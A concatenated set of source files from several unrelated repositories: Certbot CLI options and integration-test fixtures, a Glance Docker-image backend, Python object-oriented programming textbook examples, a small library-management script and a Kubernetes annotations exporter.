"automation", "--agree-tos", dest="tos", action="store_true",
default=flag_default("tos"),
help="Agree to the ACME Subscriber Agreement (default: Ask)")
helpful.add(
["unregister", "automation"], "--account", metavar="ACCOUNT_ID",
default=flag_default("account"),
help="Account ID to use")
helpful.add(
"automation", "--duplicate", dest="duplicate", action="store_true",
default=flag_default("duplicate"),
help="Allow making a certificate lineage that duplicates an existing one "
"(both can be renewed in parallel)")
helpful.add(
["automation", "renew", "certonly", "run"],
"-q", "--quiet", dest="quiet", action="store_true",
default=flag_default("quiet"),
help="Silence all output except errors. Useful for automation via cron."
" Implies --non-interactive.")
# overwrites server, handled in HelpfulArgumentParser.parse_args()
helpful.add(["testing", "revoke", "run"], "--test-cert", "--staging",
dest="staging", action="store_true", default=flag_default("staging"),
help="Use the staging server to obtain or revoke test (invalid) certificates; equivalent"
" to --server " + constants.STAGING_URI)
helpful.add(
"testing", "--debug", action="store_true", default=flag_default("debug"),
help="Show tracebacks in case of errors, and allow certbot-auto "
"execution on experimental platforms")
helpful.add(
[None, "certonly", "run"], "--debug-challenges", action="store_true",
default=flag_default("debug_challenges"),
help="After setting up challenges, wait for user input before "
"submitting to CA")
helpful.add(
"testing", "--no-verify-ssl", action="store_true",
help=config_help("no_verify_ssl"),
default=flag_default("no_verify_ssl"))
helpful.add(
["testing", "standalone", "manual"], "--http-01-port", type=int,
dest="http01_port",
default=flag_default("http01_port"), help=config_help("http01_port"))
helpful.add(
["testing", "standalone"], "--http-01-address",
dest="http01_address",
default=flag_default("http01_address"), help=config_help("http01_address"))
helpful.add(
["testing", "nginx"], "--https-port", type=int,
default=flag_default("https_port"),
help=config_help("https_port"))
helpful.add(
"testing", "--break-my-certs", action="store_true",
default=flag_default("break_my_certs"),
help="Be willing to replace or renew valid certificates with invalid "
"(testing/staging) certificates")
helpful.add(
"security", "--rsa-key-size", type=int, metavar="N",
default=flag_default("rsa_key_size"), help=config_help("rsa_key_size"))
helpful.add(
"security", "--key-type", choices=['rsa', 'ecdsa'], type=str,
default=flag_default("key_type"), help=config_help("key_type"))
helpful.add(
"security", "--elliptic-curve", type=str, choices=[
'secp256r1',
'secp384r1',
'secp521r1',
], metavar="N",
default=flag_default("elliptic_curve"), help=config_help("elliptic_curve"))
helpful.add(
"security", "--must-staple", action="store_true",
dest="must_staple", default=flag_default("must_staple"),
help=config_help("must_staple"))
helpful.add(
["security", "enhance"],
"--redirect", action="store_true", dest="redirect",
default=flag_default("redirect"),
help="Automatically redirect all HTTP traffic to HTTPS for the newly "
"authenticated vhost. (default: redirect enabled for install and run, "
"disabled for enhance)")
helpful.add(
"security", "--no-redirect", action="store_false", dest="redirect",
default=flag_default("redirect"),
help="Do not automatically redirect all HTTP traffic to HTTPS for the newly "
"authenticated vhost. (default: redirect enabled for install and run, "
"disabled for enhance)")
helpful.add(
["security", "enhance"],
"--hsts", action="store_true", dest="hsts", default=flag_default("hsts"),
help="Add the Strict-Transport-Security header to every HTTP response."
" Forcing browser to always use SSL for the domain."
" Defends against SSL Stripping.")
helpful.add(
"security", "--no-hsts", action="store_false", dest="hsts",
default=flag_default("hsts"), help=argparse.SUPPRESS)
helpful.add(
["security", "enhance"],
"--uir", action="store_true", dest="uir", default=flag_default("uir"),
help='Add the "Content-Security-Policy: upgrade-insecure-requests"'
' header to every HTTP response. Forcing the browser to use'
' https:// for every http:// resource.')
helpful.add(
"security", "--no-uir", action="store_false", dest="uir", default=flag_default("uir"),
help=argparse.SUPPRESS)
helpful.add(
"security", "--staple-ocsp", action="store_true", dest="staple",
default=flag_default("staple"),
help="Enables OCSP Stapling. A valid OCSP response is stapled to"
" the certificate that the server offers during TLS.")
helpful.add(
"security", "--no-staple-ocsp", action="store_false", dest="staple",
default=flag_default("staple"), help=argparse.SUPPRESS)
helpful.add(
"security", "--strict-permissions", action="store_true",
default=flag_default("strict_permissions"),
help="Require that all configuration files are owned by the current "
"user; only needed if your config is somewhere unsafe like /tmp/")
helpful.add(
[None, "certonly", "renew", "run"],
"--preferred-chain", dest="preferred_chain",
default=flag_default("preferred_chain"), help=config_help("preferred_chain")
)
helpful.add(
["manual", "standalone", "certonly", "renew"],
"--preferred-challenges", dest="pref_challs",
action=_PrefChallAction, default=flag_default("pref_challs"),
help='A sorted, comma delimited list of the preferred challenge to '
'use during authorization with the most preferred challenge '
'listed first (Eg, "dns" or "http,dns"). '
'Not all plugins support all challenges. See '
'https://certbot.eff.org/docs/using.html#plugins for details. '
'ACME Challenges are versioned, but if you pick "http" rather '
'than "http-01", Certbot will select the latest version '
'automatically.')
helpful.add(
"renew", "--pre-hook",
help="Command to be run in a shell before obtaining any certificates."
" Intended primarily for renewal, where it can be used to temporarily"
" shut down a webserver that might conflict with the standalone"
" plugin. This will only be called if a certificate is actually to be"
" obtained/renewed. When renewing several certificates that have"
" identical pre-hooks, only the first will be executed.")
helpful.add(
"renew", "--post-hook",
help="Command to be run in a shell after attempting to obtain/renew"
" certificates. Can be used to deploy renewed certificates, or to"
" restart any servers that were stopped by --pre-hook. This is only"
" run if an attempt was made to obtain/renew a certificate. If"
" multiple renewed certificates have identical post-hooks, only"
" one will be run.")
helpful.add("renew", "--renew-hook",
action=_RenewHookAction, help=argparse.SUPPRESS)
helpful.add(
"renew", "--no-random-sleep-on-renew", action="store_false",
default=flag_default("random_sleep_on_renew"), dest="random_sleep_on_renew",
help=argparse.SUPPRESS)
helpful.add(
"renew", "--deploy-hook", action=_DeployHookAction,
help='Command to be run in a shell once for each successfully'
' issued certificate. For this command, the shell variable'
' $RENEWED_LINEAGE will point to the config live subdirectory'
' (for example, "/etc/letsencrypt/live/example.com") containing'
' the new certificates and keys; the shell variable'
' $RENEWED_DOMAINS will contain a space-delimited list of'
' renewed certificate domains (for example, "example.com'
' www.example.com"')
helpful.add(
"renew", "--disable-hook-validation",
action="store_false", dest="validate_hooks",
default=flag_default("validate_hooks"),
help="Ordinarily the commands specified for"
" --pre-hook/--post-hook/--deploy-hook will be checked for"
" validity, to see if the programs being run are in the $PATH,"
" so that mistakes can be caught early, even when the hooks"
" aren't being run just yet. The validation is rather"
" simplistic and fails if you use more advanced shell"
" constructs, so you can use this switch to disable it."
" (default: False)")
helpful.add(
"renew", "--no-directory-hooks", action="store_false",
default=flag_default("directory_hooks"), dest="directory_hooks",
help="Disable running executables found in Certbot's hook directories"
" during renewal. (default: False)")
helpful.add(
"renew", "--disable-renew-updates", action="store_true",
default=flag_default("disable_renew_updates"), dest="disable_renew_updates",
help="Disable automatic updates to your server configuration that"
" would otherwise be done by the selected installer plugin, and triggered"
" when the user executes \"certbot renew\", regardless of if the certificate"
" is renewed. This setting does not apply to important TLS configuration"
" updates.")
helpful.add(
"renew", "--no-autorenew", action="store_false",
default=flag_default("autorenew"), dest="autorenew",
help="Disable auto renewal of certificates.")
# Deprecated arguments
helpful.add_deprecated_argument("--os-packages-only", 0)
helpful.add_deprecated_argument("--no-self-upgrade", 0)
helpful.add_deprecated_argument("--no-bootstrap", 0)
helpful.add_deprecated_argument("--no-permissions-check", 0)
# Populate the command line parameters for new style enhancements
enhancements.populate_cli(helpful.add)
_create_subparsers(helpful)
_paths_parser(helpful)
# _plugins_parsing should be the last thing to act upon the main
# parser (--help should display plugin-specific options last)
_plugins_parsing(helpful, plugins)
if not detect_defaults:
global helpful_parser # pylint: disable=global-statement
helpful_parser = helpful
return helpful.parse_args()
def set_by_cli(var):
"""
Return True if a particular config variable has been set by the user
(CLI or config file) including if the user explicitly set it to the
default. Returns False if the variable was assigned a default value.
"""
# We should probably never actually hit this code. But if we do,
# a deprecated option has logically never been set by the CLI.
if var in DEPRECATED_OPTIONS:
return False
detector = set_by_cli.detector # type: ignore
if detector is None and helpful_parser is not None:
# Setup on first run: `detector` is a weird version of config in which
# the default value of every attribute is wrangled to be boolean-false
plugins = plugins_disco.PluginsRegistry.find_all()
# reconstructed_args == sys.argv[1:], or whatever was passed to main()
reconstructed_args = helpful_parser.args + [helpful_parser.verb]
detector = set_by_cli.detector = prepare_and_parse_args( # type: ignore
plugins, reconstructed_args, detect_defaults=True)
# propagate plugin requests: eg --standalone modifies config.authenticator
detector.authenticator, detector.installer = ( # type: ignore
plugin_selection.cli_plugin_requests(detector))
if not isinstance(getattr(detector, var), _Default):
logger.debug("Var %s=%s (set by user).", var, getattr(detector, var))
return True
for modifier in VAR_MODIFIERS.get(var, []):
if set_by_cli(modifier):
logger.debug("Var %s=%s (set by user).",
var, VAR_MODIFIERS.get(var, []))
return True
return False
# static housekeeping var
# functions attributed are not supported by mypy
# https://github.com/python/mypy/issues/2087
set_by_cli.detector = None # type: ignore
def has_default_value(option, value):
"""Does option have the default value?
If the default value of option is not known, False is returned.
:param str option: configuration variable being considered
:param value: value of the configuration variable named option
:returns: True if option has the default value, otherwise, False
:rtype: bool
"""
if helpful_parser is not None:
return (option in helpful_parser.defaults and
helpful_parser.defaults[option] == value)
return False
def option_was_set(option, value):
"""Was option set by the user or does it differ from the default?
:param str option: configuration variable being considered
:param value: value of the configuration variable named option
:returns: True if the option was set, otherwise, False
:rtype: bool
"""
# If an option is deprecated, it was effectively not set by the user.
if option in DEPRECATED_OPTIONS:
return False
return set_by_cli(option) or not has_default_value(option, value)
def argparse_type(variable):
"""Return our argparse type function for a config variable (default: str)"""
# pylint: disable=protected-access
if helpful_parser is not None:
for action in helpful_parser.parser._actions:
if action.type is not None and action.dest == variable:
return action.type
return str
```
#### File: certbot-ci/certbot_integration_tests/conftest.py
```python
import contextlib
import subprocess
import sys
from certbot_integration_tests.utils import acme_server as acme_lib
from certbot_integration_tests.utils import dns_server as dns_lib
def pytest_addoption(parser):
"""
Standard pytest hook to add options to the pytest parser.
:param parser: current pytest parser that will be used on the CLI
"""
parser.addoption('--acme-server', default='pebble',
choices=['boulder-v1', 'boulder-v2', 'pebble'],
help='select the ACME server to use (boulder-v1, boulder-v2, '
'pebble), defaulting to pebble')
parser.addoption('--dns-server', default='challtestsrv',
choices=['bind', 'challtestsrv'],
help='select the DNS server to use (bind, challtestsrv), '
'defaulting to challtestsrv')
def pytest_configure(config):
"""
Standard pytest hook used to add a configuration logic for each node of a pytest run.
:param config: the current pytest configuration
"""
if not hasattr(config, 'slaveinput'): # If true, this is the primary node
with _print_on_err():
_setup_primary_node(config)
def pytest_configure_node(node):
"""
Standard pytest-xdist hook used to configure a worker node.
:param node: current worker node
"""
node.slaveinput['acme_xdist'] = node.config.acme_xdist
node.slaveinput['dns_xdist'] = node.config.dns_xdist
@contextlib.contextmanager
def _print_on_err():
"""
During pytest-xdist setup, stdout is used for nodes communication, so print is useless.
However, stderr is still available. This context manager transfers stdout to stderr
for the duration of the context, allowing to display prints to the user.
"""
old_stdout = sys.stdout
sys.stdout = sys.stderr
try:
yield
finally:
sys.stdout = old_stdout
def _setup_primary_node(config):
"""
Setup the environment for integration tests.
This function will:
- check runtime compatibility (Docker, docker-compose, Nginx)
- create a temporary workspace and the persistent GIT repositories space
- configure and start a DNS server using Docker, if configured
- configure and start paralleled ACME CA servers using Docker
- transfer ACME CA and DNS servers configurations to pytest nodes using env variables
This function modifies `config` by injecting the ACME CA and DNS server configurations,
in addition to cleanup functions for those servers.
:param config: Configuration of the pytest primary node. Is modified by this function.
"""
# Check for runtime compatibility: some tools are required to be available in PATH
if 'boulder' in config.option.acme_server:
try:
subprocess.check_output(['docker', '-v'], stderr=subprocess.STDOUT)
except (subprocess.CalledProcessError, OSError):
raise ValueError('Error: docker is required in PATH to launch the integration tests on'
'boulder, but is not installed or not available for current user.')
try:
subprocess.check_output(['docker-compose', '-v'], stderr=subprocess.STDOUT)
except (subprocess.CalledProcessError, OSError):
raise ValueError(
'Error: docker-compose is required in PATH to launch the integration tests, '
'but is not installed or not available for current user.'
)
# Parameter numprocesses is added to option by pytest-xdist
workers = ['primary'] if not config.option.numprocesses\
else ['gw{0}'.format(i) for i in range(config.option.numprocesses)]
# If a non-default DNS server is configured, start it and feed it to the ACME server
dns_server = None
acme_dns_server = None
if config.option.dns_server == 'bind':
dns_server = dns_lib.DNSServer(workers)
config.add_cleanup(dns_server.stop)
print('DNS xdist config:\n{0}'.format(dns_server.dns_xdist))
dns_server.start()
acme_dns_server = '{}:{}'.format(
dns_server.dns_xdist['address'],
dns_server.dns_xdist['port']
)
# By calling setup_acme_server we ensure that all necessary acme server instances will be
# fully started. This runtime is reflected by the acme_xdist returned.
acme_server = acme_lib.ACMEServer(config.option.acme_server, workers,
dns_server=acme_dns_server)
config.add_cleanup(acme_server.stop)
print('ACME xdist config:\n{0}'.format(acme_server.acme_xdist))
acme_server.start()
config.acme_xdist = acme_server.acme_xdist
config.dns_xdist = dns_server.dns_xdist if dns_server else None
```
#### File: certbot_integration_tests/utils/proxy.py
```python
import http.server as BaseHTTPServer
import json
import re
import sys
import requests
from certbot_integration_tests.utils.misc import GracefulTCPServer
def _create_proxy(mapping):
# pylint: disable=missing-function-docstring
class ProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
# pylint: disable=missing-class-docstring
def do_GET(self):
headers = {key.lower(): value for key, value in self.headers.items()}
backend = [backend for pattern, backend in mapping.items()
if re.match(pattern, headers['host'])][0]
response = requests.get(backend + self.path, headers=headers)
self.send_response(response.status_code)
for key, value in response.headers.items():
self.send_header(key, value)
self.end_headers()
self.wfile.write(response.content)
return ProxyHandler
if __name__ == '__main__':
http_port = int(sys.argv[1])
port_mapping = json.loads(sys.argv[2])
httpd = GracefulTCPServer(('', http_port), _create_proxy(port_mapping))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
```
#### File: certbot-ci/windows_installer_integration_tests/conftest.py
```python
import os
ROOT_PATH = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
def pytest_addoption(parser):
"""
Standard pytest hook to add options to the pytest parser.
:param parser: current pytest parser that will be used on the CLI
"""
parser.addoption('--installer-path',
default=os.path.join(ROOT_PATH, 'windows-installer', 'build',
'nsis', 'certbot-beta-installer-win32.exe'),
help='set the path of the windows installer to use, default to '
'CERTBOT_ROOT_PATH\\windows-installer\\build\\nsis\\certbot-beta-installer-win32.exe')
parser.addoption('--allow-persistent-changes', action='store_true',
help='needs to be set, and confirm that the test will make persistent changes on this machine')
def pytest_configure(config):
"""
Standard pytest hook used to add a configuration logic for each node of a pytest run.
:param config: the current pytest configuration
"""
if not config.option.allow_persistent_changes:
raise RuntimeError('This integration test would install Certbot on your machine. '
'Please run it again with the `--allow-persistent-changes` flag set to acknowledge.')
``` |
{
"source": "4n3i5v74/openstack-docker",
"score": 2
} |
#### File: contrib/DEPRECATED_glance-db-backend/api.py
```python
import functools
import hashlib
import httplib
import urllib
import json
import glance.openstack.common.log as logging
from glance.openstack.common import timeutils
LOG = logging.getLogger(__name__)
IMAGES_CACHE = []
def log_call(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
LOG.info(_('Calling %(funcname)s: args=%(args)s, kwargs=%(kwargs)s') %
{"funcname": func.__name__,
"args": args,
"kwargs": kwargs})
try:
output = func(*args, **kwargs)
LOG.info(_('Returning %(funcname)s: %(output)s') %
{"funcname": func.__name__,
"output": output})
return output
except Exception as e:
LOG.exception(type(e))
return wrapped
def _make_uuid(val):
""" Generate a fake UUID from a string to be compliant with the API
It uses a MD5 to return the same UUID for a given string.
"""
h = hashlib.md5(val).hexdigest()
return '{0}-{1}-{2}-{3}-{4}'.format(
h[:8], h[8:12], h[12:16], h[16:20], h[20:])
def _image_format(image_name, **values):
dt = timeutils.utcnow()
image = {
'id': _make_uuid(image_name),
'name': image_name,
'owner': None,
'locations': [],
'status': 'active',
'protected': False,
'is_public': True,
'container_format': 'docker',
'disk_format': 'docker',
'min_ram': 0,
'min_disk': 0,
'size': 0,
'checksum': None,
'tags': [],
'created_at': dt,
'updated_at': dt,
'deleted_at': None,
'deleted': False,
}
properties = values.pop('properties', {})
properties = [{'name': k,
'value': v,
'deleted': False} for k, v in properties.items()]
image['properties'] = properties
image.update(values)
return image
def _docker_search(term):
""" Interface to the Docker search API """
http_conn = httplib.HTTPConnection('localhost', 4243)
http_conn.request('GET',
'/images/search?term={0}'.format(urllib.quote(term)))
resp = http_conn.getresponse()
data = resp.read()
if resp.status != 200:
return []
return [repos['Name'] for repos in json.loads(data)]
def _init_cache():
global IMAGES_CACHE
if not IMAGES_CACHE:
IMAGES_CACHE = _docker_search('library')
def reset():
pass
def setup_db_env(*args, **kwargs):
pass
@log_call
def image_get(context, image_id, session=None, force_show_deleted=False):
images = [_image_format(i) for i in IMAGES_CACHE]
for i in images:
if i['id'] == image_id:
return i
@log_call
def image_get_all(context, filters=None, marker=None, limit=None,
sort_key='created_at', sort_dir='desc',
member_status='accepted', is_public=None,
admin_as_user=False):
_init_cache()
return [_image_format(i) for i in IMAGES_CACHE]
@log_call
def image_property_create(context, values):
pass
@log_call
def image_property_delete(context, prop_ref, session=None):
pass
@log_call
def image_member_find(context, image_id=None, member=None, status=None):
pass
@log_call
def image_member_create(context, values):
pass
@log_call
def image_member_update(context, member_id, values):
pass
@log_call
def image_member_delete(context, member_id):
pass
@log_call
def image_create(context, image_values):
global IMAGES_CACHE
_init_cache()
name = image_values.get('name')
if not name:
return
if '/' in name:
IMAGES_CACHE.append(name)
else:
images = _docker_search(name)
if not images:
return
for i in images:
if i not in IMAGES_CACHE:
IMAGES_CACHE.append(i)
return _image_format(name)
@log_call
def image_update(context, image_id, image_values, purge_props=False):
pass
@log_call
def image_destroy(context, image_id):
pass
@log_call
def image_tag_get_all(context, image_id):
pass
@log_call
def image_tag_get(context, image_id, value):
pass
@log_call
def image_tag_set_all(context, image_id, values):
pass
@log_call
def image_tag_create(context, image_id, value):
pass
@log_call
def image_tag_delete(context, image_id, value):
pass
def is_image_mutable(context, image):
return False
def is_image_sharable(context, image, **kwargs):
return True
def is_image_visible(context, image, status=None):
return True
``` |
{
"source": "4n3i5v74/Python-3-Object-Oriented-Programming-Third-Edition",
"score": 4
} |
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter02/inner_class.py
```python
def format_string(string, formatter=None):
"""Format a string using the formatter object, which
is expected to have a format() method that accepts
a string."""
class DefaultFormatter:
"""Format a string in title case."""
def format(self, string):
return str(string).title()
if not formatter:
formatter = DefaultFormatter()
return formatter.format(string)
hello_string = "hello world, how are you today?"
print(" input: " + hello_string)
print("output: " + format_string(hello_string))
```
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter02/point.py
```python
import math
class Point:
"Represents a point in two-dimensional geometric coordinates"
def __init__(self, x=0, y=0):
"""Initialize the position of a new point. The x and y
coordinates can be specified. If they are not, the
point defaults to the origin."""
self.move(x, y)
def move(self, x, y):
"Move the point to a new location in 2D space."
self.x = x
self.y = y
def reset(self):
"Reset the point back to the geometric origin: 0, 0"
self.move(0, 0)
def calculate_distance(self, other_point):
"""Calculate the distance from this point to a second
point passed as a parameter.
This function uses the Pythagorean Theorem to calculate
the distance between the two points. The distance is
returned as a float."""
return math.sqrt(
(self.x - other_point.x) ** 2
+ (self.y - other_point.y) ** 2
)
# how to use it:
point1 = Point()
point2 = Point()
point1.reset()
point2.move(5, 0)
print(point2.calculate_distance(point1))
assert point2.calculate_distance(point1) == point1.calculate_distance(
point2
)
point1.move(3, 4)
print(point1.calculate_distance(point2))
print(point1.calculate_distance(point1))
```
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter04/even_integers.py
```python
class EvenOnly(list):
def append(self, integer):
if not isinstance(integer, int):
raise TypeError("Only integers can be added")
if integer % 2:
raise ValueError("Only even numbers can be added")
super().append(integer)
```
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter06/dataclass_stocks.py
```python
from dataclasses import make_dataclass, dataclass
# using make_dataclass
Stock = make_dataclass("Stock", ["symbol", "current", "high", "low"])
stock = Stock("FB", 177.46, high=178.67, low=175.79)
# compared to regular object
class StockRegClass:
def __init__(self, name, current, high, low):
self.name = name
self.current = current
self.high = high
self.low = low
stock_reg_class = StockRegClass("FB", 177.46, high=178.67, low=175.79)
# using dataclass decorator
@dataclass
class StockDecorated:
name: str
current: float
high: float
low: float
stock_decorated = StockDecorated("FB", 177.46, high=178.67, low=175.79)
@dataclass
class StockDefaults:
name: str
current: float = 0.0
high: float = 0.0
low: float = 0.0
stock_defaults = StockDefaults("FB")
@dataclass(order=True)
class StockOrdered:
name: str
current: float = 0.0
high: float = 0.0
low: float = 0.0
stock_ordered1 = StockOrdered("FB", 177.46, high=178.67, low=175.79)
stock_ordered2 = StockOrdered("FB")
stock_ordered3 = StockOrdered("FB", 178.42, high=179.28, low=176.39)
```
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter06/using_dictionaries.py
```python
stocks = {
"GOOG": (1235.20, 1242.54, 1231.06),
"MSFT": (110.41, 110.45, 109.84),
}
random_keys = {}
random_keys["astring"] = "somestring"
random_keys[5] = "aninteger"
random_keys[25.2] = "floats work too"
random_keys[("abc", 123)] = "so do tuples"
class AnObject:
def __init__(self, avalue):
self.avalue = avalue
my_object = AnObject(14)
random_keys[my_object] = "We can even store objects"
my_object.avalue = 12
try:
random_keys[[1, 2, 3]] = "we can't store lists though"
except:
print("unable to store list\n")
for key, value in random_keys.items():
print("{} has value {}".format(key, value))
```
#### File: Chapter09/Case Study_ Machine Learning/machine_learn.py
```python
import csv
from random import randint
from collections import Counter
dataset_filename = "colors.csv"
def hex_to_rgb(hex_color):
return tuple(int(hex_color[i : i + 2], 16) for i in range(1, 6, 2))
def load_colors(filename):
with open(filename) as dataset_file:
lines = csv.reader(dataset_file)
for line in lines:
label, hex_color = line
yield (hex_to_rgb(hex_color), label)
def generate_colors(count=100):
for i in range(count):
yield (randint(0, 255), randint(0, 255), randint(0, 255))
def color_distance(color1, color2):
channels = zip(color1, color2)
sum_distance_squared = 0
for c1, c2 in channels:
sum_distance_squared += (c1 - c2) ** 2
return sum_distance_squared
def nearest_neighbors(model_colors, target_colors, num_neighbors=5):
model_colors = list(model_colors)
for target in target_colors:
distances = sorted(
((color_distance(c[0], target), c) for c in model_colors)
)
yield target, [d[1] for d in distances[:num_neighbors]]
def name_colors(model_colors, target_colors, num_neighbors=5):
for target, near in nearest_neighbors(
model_colors, target_colors, num_neighbors=5
):
name_guess = Counter(n[1] for n in near).most_common()[0][0]
yield target, name_guess
def write_results(colors, filename="output.csv"):
with open(filename, "w") as file:
writer = csv.writer(file)
for (r, g, b), name in colors:
writer.writerow([name, f"#{r:02x}{g:02x}{b:02x}"])
def process_colors(dataset_filename="colors.csv"):
model_colors = load_colors(dataset_filename)
colors = name_colors(model_colors, generate_colors(), 5)
write_results(colors)
if __name__ == "__main__":
process_colors()
```
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter11/formatter_factory.py
```python
class FranceDateFormatter:
def format_date(self, y, m, d):
y, m, d = (str(x) for x in (y, m, d))
y = "20" + y if len(y) == 2 else y
m = "0" + m if len(m) == 1 else m
d = "0" + d if len(d) == 1 else d
return "{0}/{1}/{2}".format(d, m, y)
class USADateFormatter:
def format_date(self, y, m, d):
y, m, d = (str(x) for x in (y, m, d))
y = "20" + y if len(y) == 2 else y
m = "0" + m if len(m) == 1 else m
d = "0" + d if len(d) == 1 else d
return "{0}-{1}-{2}".format(m, d, y)
class FranceCurrencyFormatter:
def format_currency(self, base, cents):
base, cents = (str(x) for x in (base, cents))
if len(cents) == 0:
cents = "00"
elif len(cents) == 1:
cents = "0" + cents
digits = []
for i, c in enumerate(reversed(base)):
if i and not i % 3:
digits.append(" ")
digits.append(c)
base = "".join(reversed(digits))
return "{0}€{1}".format(base, cents)
class USACurrencyFormatter:
def format_currency(self, base, cents):
base, cents = (str(x) for x in (base, cents))
if len(cents) == 0:
cents = "00"
elif len(cents) == 1:
cents = "0" + cents
digits = []
for i, c in enumerate(reversed(base)):
if i and not i % 3:
digits.append(",")
digits.append(c)
base = "".join(reversed(digits))
return "${0}.{1}".format(base, cents)
class USAFormatterFactory:
def create_date_formatter(self):
return USADateFormatter()
def create_currency_formatter(self):
return USACurrencyFormatter()
class FranceFormatterFactory:
def create_date_formatter(self):
return FranceDateFormatter()
def create_currency_formatter(self):
return FranceCurrencyFormatter()
country_code = "US"
factory_map = {"US": USAFormatterFactory, "FR": FranceFormatterFactory}
formatter_factory = factory_map.get(country_code)()
```
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter12/average_raises.py
```python
import unittest
def average(seq):
return sum(seq) / len(seq)
class TestAverage(unittest.TestCase):
def test_zero(self):
self.assertRaises(ZeroDivisionError, average, [])
def test_with_zero(self):
with self.assertRaises(ZeroDivisionError):
average([])
if __name__ == "__main__":
unittest.main()
```
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter12/test_statslist_setup.py
```python
from stats import StatsList
import unittest
class TestValidInputs(unittest.TestCase):
def setUp(self):
self.stats = StatsList([1, 2, 2, 3, 3, 4])
def test_mean(self):
self.assertEqual(self.stats.mean(), 2.5)
def test_median(self):
self.assertEqual(self.stats.median(), 2.5)
self.stats.append(4)
self.assertEqual(self.stats.median(), 3)
def test_mode(self):
self.assertEqual(self.stats.mode(), [2, 3])
self.stats.remove(2)
self.assertEqual(self.stats.mode(), [3])
if __name__ == "__main__":
unittest.main()
```
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter13/sort_service.py
```python
import asyncio
import json
from concurrent.futures import ProcessPoolExecutor
def sort_in_process(data):
nums = json.loads(data.decode())
curr = 1
while curr < len(nums):
if nums[curr] >= nums[curr - 1]:
curr += 1
else:
nums[curr], nums[curr - 1] = nums[curr - 1], nums[curr]
if curr > 1:
curr -= 1
return json.dumps(nums).encode()
async def sort_request(reader, writer):
print("Received connection")
length = await reader.read(8)
data = await reader.readexactly(int.from_bytes(length, "big"))
result = await asyncio.get_event_loop().run_in_executor(
None, sort_in_process, data
)
print("Sorted list")
writer.write(result)
writer.close()
print("Connection closed")
loop = asyncio.get_event_loop()
loop.set_default_executor(ProcessPoolExecutor())
server = loop.run_until_complete(
asyncio.start_server(sort_request, "127.0.0.1", 2015)
)
print("Sort Service running")
loop.run_forever()
server.close()
loop.run_until_complete(server.wait_closed())
loop.close()
``` |
{
"source": "4n3i5v74/Python-CGI",
"score": 4
} |
#### File: 4n3i5v74/Python-CGI/library.py
```python
users = {'parker': 'password', 'ruth': 'password'}
user_permissions = {'parker': 'reader', 'ruth': 'librarian'}
is_librarian = 0
books = {}
def login(user, pwd):
global users
global user_permissions
if user in users:
if pwd == users[user]:
print "You're logged in"
if user_permissions[user] == "librarian":
print "You're logged in as a librarian"
is_librarian = 1
return 1
else:
return 0
else:
print "User does not exist"
return 0
return 0
def add(user, password, usertype):
global users
global user_permissions
if not users.has_key(user):
users[user] = password
user_permissions[user] = usertype
return 1
else:
print "User already exists"
return 0
return 0
def delete(user):
global users
global user_permissions
if users.has_key(user):
del users[user]
del user_permissions[user]
return 1
else:
print "User doesn't exist"
return 0
return 0
def add_book(title, status):
global books
if not books.has_key(title):
books[title] = status
return 1
else:
print "Book already in the inventory! Sorry!"
return 0
return 0
def del_book(title, status):
global books
if books.has_key(title):
del books[title]
return 1
else:
print "Book not in inventory"
return 0
return 0
def borrow(title):
global books
if books.has_key(title) and books[title] != "borrowed":
books[title] = "borrowed"
print "%s has been borrowed. You have 2 weeks to enjoy it before it's due."
return 1
else:
print "Looks like either the book doesn't exist or it's currently borrowed."
return 0
return 0
def retur(title):
global books
if books.has_key(title) and books[title] == "borrowed":
books[title] = "in stock"
print "You've successfully returned your book"
return 1
else:
print "Looks like either the book is in stock already or the book isn't in the database"
return 0
return 0
username = str(raw_input("Enter your username: "))
password = str(raw_input("Enter your password: "))
choice = 1
while choice:
print "What would you like to do? (enter 0 to quit)"
print "1: add user"
print "2: delete user"
if is_librarian:
print '''3: add book
4: delete book
5: borrow book
6: return book'''
else:
print '''3: borrow book
4: return book'''
choice = int(raw_input("So what'll it be? "))
print "This menu has not been implemented yet"
choice = 0
``` |
{
"source": "4n4nd/k8s-annotations-exporter",
"score": 2
} |
#### File: src/k8s_annotations_exporter/export.py
```python
import argparse
import logging
import sys
import time
from kubernetes import client, config, dynamic, watch
from prometheus_client import REGISTRY, start_http_server
from prometheus_client.core import InfoMetricFamily
from k8s_annotations_exporter import __version__
__author__ = "<NAME>"
__copyright__ = "<NAME>"
__license__ = "MIT"
_logger = logging.getLogger(__name__)
MAX_METRIC_LABEL_VALUE_LENGTH = 100
class CustomCollector:
def __init__(self, metric_family=None) -> None:
self.metric_family = metric_family
def collect(self):
return [self.metric_family]
def update(self, metric_family) -> None:
self.metric_family = metric_family
def fetch_metric_data(k8s_config, search_params):
metric_data = []
# Creating a dynamic k8s client
k8s_client = dynamic.DynamicClient(
client.api_client.ApiClient(configuration=k8s_config)
)
watcher = watch.Watch()
for e in k8s_client.resources.get(**search_params).watch(
timeout=5, watcher=watcher
):
resource_metric = {}
if not e["object"].metadata.annotations:
continue
resource_metric["api_version"] = e["object"].apiVersion
resource_metric["kind"] = e["object"].kind
resource_metric["name"] = e["object"].metadata.name
for key, value in e["object"].metadata.annotations:
resource_metric[
"annotation_"
+ key.replace(".", "_").replace("/", "_").replace("-", "_")
] = value
metric_data.append(resource_metric)
# Gracefully stop the stream watcher
watcher.stop()
_logger.debug("Collected metric data for {} resources".format(len(metric_data)))
return metric_data
def update_metric(metric_collector, metric_data):
metric_collector.update(
InfoMetricFamily(
"k8s_resource_annotations", "Annotations set in a k8s resource"
)
)
if not metric_data:
_logger.debug("No resources found")
for metric in metric_data:
metric_collector.metric_family.add_metric(metric.keys(), metric)
def parse_args(args):
"""Parse command line parameters
Args:
args (List[str]): command line parameters as list of strings
(for example ``["--help"]``).
Returns:
:obj:`argparse.Namespace`: command line parameters namespace
"""
parser = argparse.ArgumentParser(
